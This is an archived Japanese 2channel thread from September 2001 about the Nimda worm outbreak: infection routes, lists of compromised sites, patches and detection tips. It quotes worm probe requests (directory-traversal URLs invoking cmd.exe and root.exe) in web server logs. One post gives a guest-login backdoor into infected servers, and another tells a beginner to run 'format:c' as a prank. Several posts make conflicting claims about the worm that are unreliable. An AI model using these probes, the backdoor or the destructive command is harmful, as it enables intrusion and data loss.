2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Nimda !!

1 :名無しさん@お腹いっぱい。:01/09/19 12:31
午前中からコイツのせいでパニック中・・・

2 :名無しさん@お腹いっぱい。:01/09/19 12:33
2だ

3 :名無しさん:01/09/19 12:34
もう飽きた。

4 :名無しさん@お腹いっぱい。:01/09/19 12:36
Nimda情報@symantec

http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

5 :名無しさん@お腹いっぱい。:01/09/19 12:43
気が付かないうちにウチもやられてるぞゴルァ!!

6 :ここも感染:01/09/19 12:58
http://www.ieaj.co.jp/plutonium/

7 :名無しさん@お腹いっぱい。:01/09/19 13:00
感染ルートは複数みたいだね。メールの添付ファイルに、
IEでのページのブラウス。おまけにCodeRedみたいにIISの
脆弱性をついて侵入増殖。(゚д゚)コワー

8 :名無しさん@お腹いっぱい。:01/09/19 13:03
おぃ、MSN!
頼むから、サイトのトップにでかでかと警告をだしてくれよ。

9 :名無しさん@お腹いっぱい。:01/09/19 13:04
あとファイル共有使って増殖するみたいね。会社のLANに
感染したノートPCが接続されたら、、、、一気に増殖でしょうか。

10 :名無しさん@お腹いっぱい。:01/09/19 13:05
Nimdaってなんて読むの?

11 :名無しさん:01/09/19 13:06
>>10
ニダ!

mはサイレントね(藁

12 :名無しさん@お腹いっぱい。:01/09/19 13:07
>>9
一気に増殖します
ウチだとファイルサーバ上に3000個近くemlファイルが出来た
フォルダの数だけ出来るからなあ
>>10
ニムダでいいのではないかと

13 :名無しさん@お腹いっぱい。:01/09/19 13:10
>>12
10はただの洒落だろう

14 :( ´Д`):01/09/19 13:09
>>8
激しく同意

15 :訂正:01/09/19 13:11
10NG 11だった

16 :名無しさん@お腹いっぱい。:01/09/19 13:12
Nimda ←→ admiN

17 :名無しさん@お腹いっぱい。:01/09/19 13:15
ttps://www.netsecurity.ne.jp/article/9/2839.html

これ見ると発信元は中国っぽいな。
今話題のアラブ系かと思ったが

18 :名無しさん@お腹いっぱい。:01/09/19 13:18
駆除ソフトって出回ってますか?
なぜか、1分毎に10秒程度インターネットへの接続が止まるのですが
感染してる証拠でしょうか?

19 :名無しさん@お腹いっぱい。:01/09/19 13:21
アタックしてきた企業やら大学名言ったらヤバい?

20 :12:01/09/19 13:25
emlファイルってもともとそのフォルダにあったファイルが書き換わってるっぽいんだけど、同じような症状出た人いる?
例えば、
マイ ドキュメントへのプョートニット.eml
というファイルがあるのだが、これはマイ ドキュメントへのショートカットが上書きされたっぽいんだけど

21 :名無しさん@お腹いっぱい。:01/09/19 13:31
>19
いいんでない。。。。。(笑)
三井物産とか??

22 :19:01/09/19 13:36
>>21
えーと、日本ユニシス・ソフトウェアって結構大きなとこですよね?
ちょっとうれしい(オイ

あとはよく知らない会社と追手門学院(サーバではないけど)

23 :名無しさん@お腹いっぱい。:01/09/19 13:41
あの、感染してるかどうかってどうすればわかりますか? とりあえず、「*.eml」でハードに検索
かけてみて、ファイルが今日昨日で大量に出ていなければOK?

24 :名無しさん@お腹いっぱい。:01/09/19 13:55
MSNのサイトをほとんど見たけど、全然情報ないぞ!いいかげんにしろMSN!
俺の時間を返せ!ばかやろう!わかりやすくTOPにもてコイ!!あー
すげームカツク。

25 :名無しさん@お腹いっぱい。:01/09/19 14:01
>>24
MSNに普通に載っているし。
http://help.msn.co.jp/notice.htm

26 :ななしさん:01/09/19 14:01
HTTPでのアタック、第一オクテットは固定みたいだね。

27 :名無しさん@お腹いっぱい。:01/09/19 14:03
>>25
あれのどこがTOPページなのだ?

28 :名無しさん@お腹いっぱい。:01/09/19 14:12
>>27
topページから行ける。

29 :名無しさん@お腹いっぱい。:01/09/19 14:17
>>28
この手の情報を気にしてるやつしか読まねーからほとんど意味無し。

30 :Zone Alarm@警告でまくり:01/09/19 14:21
『Code Red』を超える新種ワームだって!
http://japan.cnet.com/News/2001/Item/010919-3.html?mn
>24
私もそう思った(-_-;)

31 :IE6.0だから心配なし:01/09/19 14:26
改竄され、踏み台となったweb
 ・msnトップページ
  http://www.msn.co.jp/
 ・オリコ
  http://www.orico.co.jp/
 ・オリコ
  http://www.orico.co.jp/senden/cm/e1.html
 ・山梨学院大学
  http://www.ygu.ac.jp/
 ・山梨学院大学法学部
  http://www.ygu.ac.jp/guide/hougakuseiji/index.html
 ・建設物価メディア株式会社
  http://www.kensetu-bukka-m.co.jp/
 ・建設物価メディア株式会社
  http://www.kensetu-bukka-m.co.jp/rireki/0109_edit_3.htm
 ・株式会社マウント富士インターネット
  http://www.mfi.or.jp/www/
 ・都留信用組合
  http://www.mfi.or.jp/w3/home0/tsurusin/
 ・RESORTHOTEL CAMELOT
  http://www.mfi.or.jp/camelot/main.htm
 ・株式会社ストローカー ジャパン
  http://www.mfi.or.jp/sjc/
 ・日本囲碁ソフト
  布石・定石パワー アップデートモジュールのダウンロード
  http://www.igosoft.co.jp/html/update/jpow2up.html
 ・囲碁ソフト 次の一手
  http://www.igosoft.co.jp/html/UteruNyu/keisan.htm
 ・株式会社エルミックシステム
  http://www.elmic.co.jp/japanese/index.html
 ・株式会社タイリクトラベル
  http://www.tairiku.co.jp/hotel/
 ・株式会社タイリクトラベル TE ANAU テアナウ ホテル料金一覧
  http://www.tairiku.co.jp/hotel/oceania/TEU_trf_A.html
 ・JTB GLOBAL ASSISTANCE
  http://www.jga.co.jp/Indexright.htm
 ・マックスバリュ東北株式会社
  http://www.mv-tohoku.co.jp/
 ・株式会社 日東物産
  http://www.prland.co.jp/
 ・株式会社 日本ユニオンシステム
  http://www.unionsys.co.jp/
 ・代官山美容外科
  http://www.mpint.co.jp/~dky/congress_J.htm
 ・RSoundLibrary
  http://www.crypton.co.jp/Web98/html/10380.html
 ・東京工業大学 井口家成 研究室HP内の個人ページ
  http://www.htsc.ap.titech.ac.jp/member/kawai/test.htm
 ・志學館学園
  http://www.jkajyo.ac.jp/
 ・志學館学園
  http://www.jkajyo.ac.jp/sgn/camp/13kimo.html
 ・キャリアプラザ名古屋支店
  http://www.hito-plaza.com/MM/news010914.htm
 ・早稲田大学 嘉納研究室
  http://www.kano.arch.waseda.ac.jp/
まだまだ、増大中(感染しないようにしてから覗いてね)

32 :名無しさん@お腹いっぱい。:01/09/19 14:28
>>30 このページわかりやすいね。TNX

33 :わお:01/09/19 14:35
ウイルス名を逆に読むと、「Admin(政府)」が「2(to)」「3W(第三次世界大戦)」となることから、一部には「同時多発テロ事件と関連している」との見方がある。同長官は「現時点では関連するという証拠はない」と否定した。


[毎日新聞9月19日

34 :名無しさん@お腹いっぱい。:01/09/19 14:40
>>33 ウィルス名って発見した奴が名付けるのでしょ?
関係ないんじゃないかな。W32ってWin32の略って
普通思うはずだが。

35 :名無しさん@お腹いっぱい。:01/09/19 14:41
>>26
使用している機械へのアタックを見てると、これまで22件中、21件までは
おっしゃる通り第1オクテットは同じなのですが、1件違うところがありました。

36 : :01/09/19 14:47
>>18

うちの場合は、アライドテレシスAR100というルーターで
フレッツISDN接続ですが、平均2分に1回ルーターが、
リブートを繰り返す状態が続いています。
朝メーカーに問い合わせたところ、メーカーでも調査するが、
うちのAR100をHWリセット掛けてみてとか、NTTに
回線調査を依頼してくれという対応でした。
それが、先程メーカーから電話があり、この現象がNimdaの
影響ということが判りました。
AR100はルーター設定をブラウザを通じて行えるように
なっており、この機能にウィルスが影響を与えているそうです。
当面の対応方法としてはhttpのアクセスを全て遮断すること
でリロード現象は取り合えず無くなるとのことですが....。
現在はメーカーに同様の問い合わせが多数出ているそうです。

37 :名無しさん@お腹いっぱい。:01/09/19 14:48
対策法はどうするの?
Internet Explorer 5.5Service Pack 2をインストールするだけでいいの?

38 :名無しさん@お腹いっぱい。:01/09/19 15:09
で、Nimdaに感染した鯖の裏口の入り方はまだ判明してないの?

39 : 参考:01/09/19 15:11
>>36
くそルータの不良はCodeREDんとき既に広報されていた。
ちゃんと見てない36がわるい。

40 :名無しさん@お腹いっぱい。:01/09/19 15:11
第一オクテットを固定して
あちこちにhttp port probe2発ずつ撃ってるな

41 :名無しさん@お腹いっぱい。:01/09/19 15:16
>>38

ユーザー:guest
パス無しでログインするだけ。
管理共有も全部見れたじょ。

あ、言わんほうがよかった?

42 :名無しさん@お腹いっぱい。:01/09/19 15:21
>>23
同一サブネット内にapacheとかを立てて、attackがこなければ大丈夫(藁

43 :名無しさん@お腹いっぱい。:01/09/19 15:26
テレビでは未だ一言も触れずカルーセルなんてやってるしな(;´Д`)

44 :名無しさん@お腹いっぱい。:01/09/19 15:27
う〜む、Nimda に便乗して NetBIOS への attack もかけられてしまった。
scandeted からの警告
--begin--
Possible UDP port flooding from 200.45.176.173 to xxx.xxx.xxx.xxx
I've counted 40 connections.

First connection was made to 137 port at Wed Sep 19 04:41:41 2001
Last connection was made to 137 port at Wed Sep 19 04:42:03 2001
--end--

45 :名無しさん@お腹いっぱい。:01/09/19 15:29
つぅか書き込む時に
The firewall has blocked Internet access to your computer
(HTTP) from ton.2ch.net (64.71.133.114) (TCP Port 4186).

The firewall has blocked Internet access to your computer
(TCP Port 8080) from ton.2ch.net (64.71.133.114) (TCP Port 4191).

とか5、6発飛んでくるのはどうゆうこと?

46 :名無しさん@お腹いっぱい。:01/09/19 15:31
今、ニュースでMSNが感染しましたよってやってるヽ(;´ー`)ノ

47 :名無CCDさん@画素いっぱい:01/09/19 15:32
今、日本テレビでこのニュースやってます。MSNは素人を相手にしてるんだから、
判りやすくして欲しい。

48 :名無しさん@お腹いっぱい。:01/09/19 15:32
>>45
不正 proxy かどうかを 80 や 8080 が open になっているか
どうかではんだんしているかららしい。

49 :名無しさん:01/09/19 15:35
ネットしてて、知らないHPへ逝ってみたら
いきなり「ファイルダウンロードする?って聞かれて
よく見たら「readme.exe」だった。
もちろん、ダウンロードなんてしなかったけど
・・・あ〜、ビックリした。

50 :名無しさん@お腹いっぱい。:01/09/19 15:40
>>48
サンクス!

51 :名無しさん@お腹いっぱい。:01/09/19 15:41
質問。

httpdで、オプション プロクシ/キャッシュのアクセス制御タブを、
アクセス許可=127.0.0.1
アクセス拒否=*.*.*.*
にしたが、これって簡易ファイアウォールになったの?
多分違うんだろうな。

52 : :01/09/19 15:41
物知りな >>39 さんへ
なんだ〜。知ってたんなら早く教えてくれればいいのに。
もう、くそルーターは捨てることにしたよ。

でもね、CodeRedん時は、「AR100は問題ございません」
てのがメーカーの公式見解だったんだよ。

http://www.allied-telesis.co.jp/support/misc/codered.htm
http://www.allied-telesis.co.jp/support/misc/codered2.htm
http://www.allied-telesis.co.jp/support/misc/codered3.htm

53 :名無しさん@お腹いっぱい。:01/09/19 15:43
危なっかしいからしばらくマクでアクセスするんだけどいきなり
”xxxx.co.jp/readme.eml”ってウィンドウが開いて妖しい文字がバンバン表示されるよ(w
これって「対策施せよゴルァ」メールしちゃっていいよね

54 :名無しさん@お腹いっぱい。:01/09/19 15:44
Nimdaすごい勢いだね。
昨日までCodeRedのアタックがが日に100件程度だったのが昨日は480件も来てるよ。

55 :名無しさんに接続中…:01/09/19 15:44
ご質問とご回答
Q.自分の会社のサーバーが被害にあった。MSN からの攻撃が原因ではないか。

A. MSN ではサーバーが直接マイクロソフト社外のサーバーに対して影響を及ぼしたことはないと考えています。
MSN のインターネット上に開いたサーバーは、サーバー機能ではなくそのコンテンツファイルが 9/18 の夜 11 時以降 1 時間ほど感染した状態にありましたが、これにより影響を受けたのは直接このサーバーにアクセスした利用者のコンピュータになります。
なお、利用者のコンピュータが感染するには、ブラウザのバージョンなどいくつかの条件がそろった場合に限られます。

Q.自分のコンピュータが感染しているかどうかどのように確かめられるか。

A.コンピュータのハードディスク内を検索して、"readme.eml" ファイルおよび "readme.exe" ファイルが存在していない場合、そのコンピュータが感染している可能性はほぼありません。
また現時点で感染していない場合でも、今後何かの経路で感染する可能性を排除するために、以下の対策をとってください。

ブラウザのバージョンごとに、最新のサービスパックをインストールする。

インターネット利用中に、「このファイルをダウンロードしますか」という画面が出た場合には、ダウンロードをせずブラウザを終了させる。
ウィルス対策ソフトを導入し、Nimda ワームを駆除することがかのうなウィルス定義ファイルをインストールする。また最新の定義ファイルでコンピュータ内をスキャンする。

56 :名無しさん@お腹いっぱい。:01/09/19 15:48
IE6にしといてラッキー・・・!感染しないよね。
あ、・・・OE6は大丈夫か?

あと、ActiveXを無効にすればいいんだと思うがどうよ?

57 :名無しさん@お腹いっぱい。:01/09/19 15:54
トレンドマイクロが株価を上げてるYo!

58 :名無しさん@お腹いっぱい。:01/09/19 15:54
シマンテックとかの駆除対策プログラム走らせたら「感染してない」って言った癖に
壁紙が消されちまったぞい!どうなっとるんだ、グルァァァァァ

59 :( ´Д`):01/09/19 15:56
いまWeb鯖のログみてみたらCodeRedよりすごいね。
202.224.176.4 - - [19/Sep/2001:15:51:00 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
202.224.176.4 - - [19/Sep/2001:15:51:05 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"

こんな大企業からも・・・

60 :名無しさん@お腹いっぱい。:01/09/19 15:58
W32Nimdaを逆に読むと。
admiN23Wとなり、「政府(admin)へ(2=to)第三次世界大戦(3W)」
で、
「政府は第三次世界大戦へ」と読めるそうです。

61 :名無しさん@お腹いっぱい。:01/09/19 15:59
>>60 既出。>>33-34

62 :名無しさん@お腹いっぱい。:01/09/19 16:00
>>56
俺も、昨日ここで話題になってたからMSN覗いてみたけど、ActivX無効にしてたから真っ白なページが出ただけだった。
感染無し!マンセー!

63 :名無しさんに接続中…:01/09/19 16:07
Nimdaばら撒きサイト、逝くなよ!

www.zigen.co.jp
osk.offer-line.co.jp
camping.outdoor.co.jp
www.kddis.ne.jp
vweb1.asaka.ne.jp
ns.tsuruta.co.jp

64 :名無しさん@お腹いっぱい。:01/09/19 16:08
http://203.252.132.117/

ダブル感染

65 :名無しさん@お腹いっぱい。:01/09/19 16:09
将来的にIE6も感染する可能性があるのかな。
だとしたら、もっと議論が必要だな。
今日はネットサーフィンはしない。バックアップもとろう。
用心には用心を・・・・ (--;

66 :名無しさん@お腹いっぱい。:01/09/19 16:09
>>59
毎日新聞あぼーん?

67 :名無しさんに接続中… :01/09/19 16:12
なんか「NEW MESSAGE/You have 1 message wating for you」
ってウィンドウが出てきたんだけどこれがらみ?

68 :名無しさん@お腹いっぱい。:01/09/19 16:20
おいおい! うちのサーバ、トレンドマイクロからnimda来てるよ。
ip003.trendmicro.co.jp - - [18/Sep/2001:22:36:51 +0900] "GET /msadc/..%255c../..%255c../..%255c/ ...

まったく、朝から対策に追われてやっと今昼飯だよ。

あ、ブラウザはJavaスクリプトオフでOKだと思うけど。
荷無駄は既存のページに「readme.eml」をDLさせるJavaスクリプトを入れるから。

69 :名無しさん@お腹いっぱい。:01/09/19 16:21
それはCodeRed(かその他)に感染してるとだれかが教えてくれてるんだろうよ

70 :名無しさん@お腹いっぱい。:01/09/19 16:25
>>67
ただの広告だ。それは。

71 :名無しさん@お腹いっぱい。 :01/09/19 16:27
1.ページを表示する段階で、ある種のファイルをダウンロードするように求められる。
2.ページを表示する段階で、ある種のファイルを自動的にダウンロードして実行し、
結果としてハードディスク内に大量のファイルを生成する。

IE5.0は1or2どっち?

72 :名無しさん@お腹いっぱい。:01/09/19 16:33
-- Nimuda感染経路 --

一次感染
ユーザがこのウイルスによって改ざんされたホームページを訪れると
「readme.eml」(拡張子emlはOutlook Expressのメール形式)を
自動的にオープンさせます。
ユーザのマシンにInternet Explorerのセキュリティホールのパッチが
適用されていない場合、ウイルスに感染してしまいます。
ウイルスは自身のSMTP(メール)エンジンを使用してウイルス付メール
(「readme.exe」という添付ファイル)を自動的に送信し感染を拡大していきます。
同時に、ランダムなIPアドレスをアクセスして、
IISのパッチがあたっていないWebサーバの場合、
同様にウイルスを埋め込む攻撃をしかけます。

二次感染
また、ウイルスは感染したマシンのA〜Zまでのドライブにウイルス自身をコピーし、
共有したネットワークドライブを介しても感染を広げます。
同時にウイルスはユーザのマシンの中のHTMLファイルを改ざんし、
JAVAスクリプトを埋め込みますので、そのユーザがHPを公開している場合、
HPを訪れた新たなユーザはウイルスに感染することになります。
ウイルス付メールを受け取った新たなユーザがOutlook ExpressまたはOutlookを利用し、
かつInternet Explorerのセキュリティホールのパッチが適用されていない場合には、
メールを見る(プレビュー機能)だけでウイルスに感染(ダイレクトアクション)します。

-- 引用元 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm --

73 :名無しさん@お腹いっぱい。:01/09/19 16:35
>>71
激しくがいしゅつ!
IE5.0のSP1までが2,SP2が1

74 :名無しさん@お腹いっぱい。:01/09/19 16:36
こんな所まで…
210.150.177.216 - - [19/Sep/2001:16:00:06 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"

75 :名無しさん@お腹いっぱい。:01/09/19 16:45
IISでアクセス拒否のIPとして登録してもスルーされちゃうのかな?
とりあえず馬鹿みたいにアクセスログが膨らんでムカツくんでけり飛ばしたいんだけど・・・

76 :名無しさん@お腹いっぱい。 :01/09/19 16:47
ウイルスきていません。
WIN2000だと感染しないのでしょうか?
ちなみにアンチウイルスソフトとファイアーウォール
ともにあります。
ちょっと寂しい感じします。

77 :名無しさん@お腹いっぱい。:01/09/19 16:48
Nimda対策

対策 1
■Internet Explorer のアップデート
[IEのバージョンの確認は「ヘルプ」メニューの「バージョン情報」で確認]
1.IE5.0、5.01、5.02を使用してる方 --- 5.01SP2 または 5.5SP2へアップデート
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910 (5.01SP2へ)
http://www.microsoft.com/downloads/release.asp?releaseid=32082 (5.5SP2へ)
2.IE5.5を使用している方 --- IE5.5SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?releaseid=32082 (5.5SP2へ)
3.IE5.0以下、それ以外
http://windowsupdate.microsoft.com/?IE でそれぞれ個別の対策。
4.上記全ての方のうち、最新のIE6を導入したい方
http://www.microsoft.com/windows/ie_intl/ja/download/default.htm
--タブブラウザを使用している方も対策が必要です。

対策2
■IISのセキュリティパッチをあてる。
[Win2kpro使用している方でもIISが知らないうちに
インストールされている場合があります。]
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
で環境に合わせたパッチを入手してパッチをあてる。

◎感染してるかどうかチェックしたい方
■感染チェック
1.Windowsキー+Fキーで検索窓を表示し次のワードで検索『*.eml』『readme.exe』『MEP51B3.TMP.EXE』
発見された場合は感染しています。
2.9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
  →readme.exe, readme.emlの感染チェック可能
3.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
  →readme.exeの感染チェック可能

78 :名無しさん@お腹いっぱい。:01/09/19 16:50
ニュース速報板よりコピペ

現在出回っているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm
・拡張子.emlのファイルとreadme.exeを検索して消せばよい
→そんなことしてもシステムファイルや実行ファイルが感染しているのでムダです、あきらめましょう。
・SP2をインストールすればヨイ
→感染後にインストールしても無意味ですよ〜。
・これはラディンのテロと関係がある
→関係ないと発表されてます。
・MSNのページを見たらやばい、感染する
→既に朝9時頃に対策されました。が、昨晩の夜11時頃から本日朝9時頃まで、
 MSNのトップページを表示させた人でSP2でないIE使用の人は感染の疑いがあります。
・JavaScript切っていれば大丈夫
→感染したページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・IE6、IE5.5SP2だから大丈夫
→これも、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・NetscapeNavigatorやOperaだから大丈夫
→くどいようですが、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・ICQとかMSN Messengerで感染する
→しません。が、ウイルス付きのファイルを送られてきたらその限りではない。

79 :名無しさん@お腹いっぱい。:01/09/19 16:56
なんだよ・・・・
ここも
  while(1){ }
かよ・・・

80 :名無し:01/09/19 17:03
TROJ_NIMDA.A詳細情報
http://www.trendmicro.co.jp/virusinfo/nimda.htm

81 :初心者:01/09/19 17:05
>>79
while(1){ }ってどういう意味?

82 :名無しさん@お腹いっぱい。:01/09/19 17:05
>>81
このページ見ただけでNimdaに感染するということ。

83 :シマンテックのパーソナルファイア−ウォールアンチウィルス:01/09/19 17:09
昨日の今日だからまだ出来ないんだろうけど、
感染してしまい、このウィルスを駆除するワクチンはいつ出来て
いつダウンロード出来るのだろう?

84 :初心者:01/09/19 17:10
>>81
じゃあ、俺も感染しちゃたの?
鬱・・・・(涙

85 :初心者:01/09/19 17:11

>>82
解答と対策きぼーん!

86 :名無しさん@お腹いっぱい。:01/09/19 17:12
ドライブを検索したら
2chのかちゅのログのdatファイルにあったんだけどこれって何?
さっぱりわかんない。やばいの?
今のところ何の不都合もないけど。

87 :名無しさん@お腹いっぱい。:01/09/19 17:14
>>85
for(;ture;){} ともいう。

88 :名無しさん@お腹いっぱい。:01/09/19 17:14
16:30頃oricoからアタック有り。
・・・再感染ですか・・・

89 :名無しさん@お腹いっぱい。:01/09/19 17:18
>>85
C言語だよ!いちいち騒ぐな!アホ!

90 :名無しさん@お腹いっぱい。:01/09/19 17:20
>初心者
とりあえず、format:c

91 :名無しさん@お腹いっぱい。:01/09/19 17:21
からまわ〜りヽ(´ー`)ノ

92 :名無しさん@お腹いっぱい。:01/09/19 17:22
>>78
いくつか気になる点があるが、俺が間違っているか?

・拡張子.emlのファイルとreadme.exeを検索して消せばよい
→そんなことしてもシステムファイルや実行ファイルが感染しているのでムダです、あきらめましょう。
?システムファイルってiniの事?
 Nimda.dllを削除する事で大丈夫では?
 他のシステムファイルを改竄し、寄生するとの事例は無いと思われる。

・SP2をインストールすればヨイ
→感染後にインストールしても無意味ですよ〜。
?無意味では無いと思うが・・・・・
 SP2適用後に削除しても良いのでは?

・ICQとかMSN Messengerで感染する
→しません。が、ウイルス付きのファイルを送られてきたらその限りではない。
?ICQ経由での感染も心配されているのは本当では?

93 :初心者:01/09/19 17:24
>>90
MS−dosでいいんでしたっけ。
ありがとうございます!早速やってみます。

94 :名無しさん@お腹いっぱい。:01/09/19 17:26
>>93
ぜったいやっちゃだめ

95 :名無しさん@お腹いっぱい。:01/09/19 17:28
結局どんな症状がでるんよ?
感染してるかどうかすぐわかるものなの?
昨日深夜12時ごろMSNみちゃったけど・・・
とりあえず、Readme.exeもReadme.emlも検索されないんだけど・・・。

ちょっと不安です。

96 :名無しさん@お腹いっぱい。:01/09/19 17:28
今頃93はあぼーんになっているだろう。
合掌・・・・

97 :名無しさん@お腹いっぱい。:01/09/19 17:28
>>92
詳細忘れたが、DLLファイルのいくつが*.emlファイルに置き換わる。
よってそのファイルを消してもDLLファイルが復活しないのでダメ
あと*.exeファイルのほとんどが書き換えられ感染するので現実的には
消して済む問題ではない。
>ICQ経由での感染も心配されているのは本当では?
確かにこれは可能性が指摘されているだけでまだはっきりしない。

98 :名無しさん@お腹いっぱい。:01/09/19 17:29
>>90はNimdaより凶悪。初心者かわいそうだYO・・・・

99 :名無しさん@お腹いっぱい。:01/09/19 17:31
うちの会社、就業中にも関わらず警告アナウンスがアタヨ

100 :名無しさん@お腹いっぱい。:01/09/19 17:32
っていうか、セキュリティー板の奴ってC言語も知らないの?

他にも知らない奴、目つむって手挙げろ!!

101 :95:01/09/19 17:33
とりあえず、MSNに入ったときには、
・JavaとActivXはOFFだったような気がします。
・IE5.5SP1でした。
・入ったときは真っ白な画面で何も出ませんでした。
以上から、感染してるのでしょうか?

102 :名無しさん@お腹いっぱい。:01/09/19 17:35
感染はしてなかったけど、WINNTフォルダが
Admin$みたいな名前で共有されてた。
他にこうなった人いない?

103 :名無しさん@お腹いっぱい。:01/09/19 17:35
>>95
・ファイルの破壊。
・ネットワークの情報量が増えて麻痺する。
感染してるか否かはわからん。
スマソ。。。

104 :名無しさん@お腹いっぱい。:01/09/19 17:36
>>93、来なくなったね・・・・
馬鹿すぎる・・・たぶん感染してなかったのに・・・

105 :92:01/09/19 17:38
>>97
DLLが置き換わると書いてあるソースをきぼーん!

>>95
なら、心配するな!

結局、Nimdaは感染力が強いけどクライアントの中身を削除したりするタイプではない。
但し、インターネット全体として考えた場合は負荷を増大させるので非常に「悪質」なだけと俺は思うが・・・
結局は、サーバーをターゲットとしたワームであり、クライアントは単なる感染媒体だと思うのだが、間違っているか?

106 :95:01/09/19 17:40
>>103 >>105
ありがとう。
安心して寝れます。
おやすみ。

107 :名無しさん@お腹いっぱい。:01/09/19 17:41
>>105
でも将来的には亜種が現れるかもしれんな。
こういう技術があって、セキュリティーホールがあったということが問題。

108 :名無しさん@お腹いっぱい。:01/09/19 17:43
>>105
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
ソースってこれじゃないの?

109 :名無しさん@お腹いっぱい。:01/09/19 17:44
>>105
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM

110 :三村:01/09/19 17:45
nimdaかよっ!

111 :名無しさん@お腹いっぱい。:01/09/19 17:46
思ったより深刻だよね。感染したら、完全に正常化しようと思ったら
フォーマット&再インストールしかないよね。?間違ってる?

112 :名無しさん@お腹いっぱい。:01/09/19 17:56
>EXEファイルにはワームが前方追加されます。
これが最悪だな。ワクチンできも、EXEファイル書き換えるなんて
信用できないし。困ったもんだ。

そぉーす
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM

113 :名無しさん@お腹いっぱい。:01/09/19 17:57
ライコスとエキサイトのメールサーバーはダウンしてない?

114 :92:01/09/19 17:56
>>108 >>109
ありがと!
これの情報はIIS側が稼動しているマシンかと思ってた・・・

て言う事は、トレンドマイクロの情報は嘘ばっかり?
http://www.trendmicro.co.jp/virusinfo/nimda.htm
「単体で動作する一個の独立したプログラムであり、他のファイルへの感染活動はありません。検出したファイルは単純に削除してください。 」

>>111
確かに他のファイルに感染して置き換えたりしてるのなら深刻。

115 :名無しさん@お腹いっぱい。:01/09/19 17:58
>102
それ感染してる恐れ有り…。
ttp://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
をみれ。

116 :名無しさん@お腹いっぱい。:01/09/19 17:59
俺も感染したよー。
何故だ、何故なんだー!

117 :名無しさん@お腹いっぱい。:01/09/19 18:00
MXでclone CD落として実行したんだけど、それと関係あるのかな?

118 :92:01/09/19 18:01
>>112
ライコスは最近の大量メールでの障害の続きでは?
http://www.watch.impress.co.jp/internet/www/article/2001/0917/free.htm

エキサイトは常に障害あります。(w

119 :名無しさん@お腹いっぱい。:01/09/19 18:05
昨夜はniftyからログインできなかったのだが、これのせいだったか?

120 :名無しさん@お腹いっぱい。:01/09/19 18:05
>>117 EXE圧縮ファイルだった場合、やばいね。

121 :名無しさん@お腹いっぱい。:01/09/19 18:07
トレンドマイクロのウイルスバスター更新用サーバがダウンしている模様。

122 :名無しさん@お腹いっぱい。:01/09/19 18:12
Nimda特需ニダ!

http://headlines.yahoo.co.jp/hl?a=20010919-00000006-vgb-sci

逝ってきます…

123 :名無しさん@お腹いっぱい。:01/09/19 18:14
ノートンアンチウィルスのパターンファイル、
今日の午後になってから頻繁に更新されてる。
スキャンして安心と思ってる人も、再度確認したほうが良いよ。

124 :92:01/09/19 18:14
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
の内容が変わっているような気がするが・・・・・

125 :名無しさん@お腹いっぱい。:01/09/19 18:16
今感染しているサーバやサイトはどこですか?

126 :名無しさん@お腹いっぱい。:01/09/19 18:19
>>123
今さっき更新したけど日付は18日だ。アメリカ時間なのかな?

127 :92:01/09/19 18:18
>>125
これで、判る
http://search.fresheye.com/?kw=readme%2eeml
後は
http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci
でも

128 :初心者だから分からない…:01/09/19 18:21
「readme.eml」「MEP51B3.TMP.EXE」は無いんだけど
「readme.exe」を検索すると

USER.DAT
フォルダ:C:\WINDOWS
サイズ:1,511,456バイト
更新日時:2001/09/19 17:46

↑が引っかかる…かかか感染してないよね???(動揺中)

129 :名無しさん@お腹いっぱい。:01/09/19 18:21
ドライブを検索したら
2chのかちゅのログのdatファイルにあったんだけどこれって何?
さっぱりわかんない。やばいの?
今のところ何の不都合もないけど。

だれか教えて・・・寝れないよう

130 :名無しさん@お腹いっぱい。:01/09/19 18:23
>>129 ただのログデータだと思われ

131 :ななし:01/09/19 18:23
各クライアントごとに完全な対策しないとwindowsネットワーク共有を
勝手にするんで社内LANで1台感染すると全滅するぞ。
とりあえずfirewallがあるなら80は止めろ。

132 :名無しさん@お腹いっぱい。:01/09/19 18:23
>>102

僕もWIN NTです。恐らくおんなじ状態ですね
共有しないに設定しても再起動すれば
また共有になってしまう、、、

感染するようなことした覚えないんだけどなぁ。

133 :名無しさん@お腹いっぱい。:01/09/19 18:24
>>127
ファイルダウン要求されて途中で逃げ帰った。くわばらくわばら。

134 :名無しさん@お腹いっぱい。:01/09/19 18:25
>>132 Win2Kです。Apache鯖たててるんだけど、アタック受けたあと
こうならない?$Cとかって管理共有だよね。どっかで管理共有
の設定無効にできたはずだけど、無駄なのかな。
感染してる兆候はないんだけど。

135 :名無しさん@お腹いっぱい。:01/09/19 18:26
>>132
それは、OSがそういう仕様っつうかなんつーか、、、
感染症状ではないとだけ言っておきましょう。

136 :名無しさん@お腹いっぱい。:01/09/19 18:28
だ、だれか>>128にも答えてお願い…

137 :名無しさん@お腹いっぱい。:01/09/19 18:29
>>132

管理共有の止め方

WIN2000 FAQ
http://homepage2.nifty.com/winfaq/wxp/network.html#910

138 :名無しさん@お腹いっぱい。:01/09/19 18:30
>>136
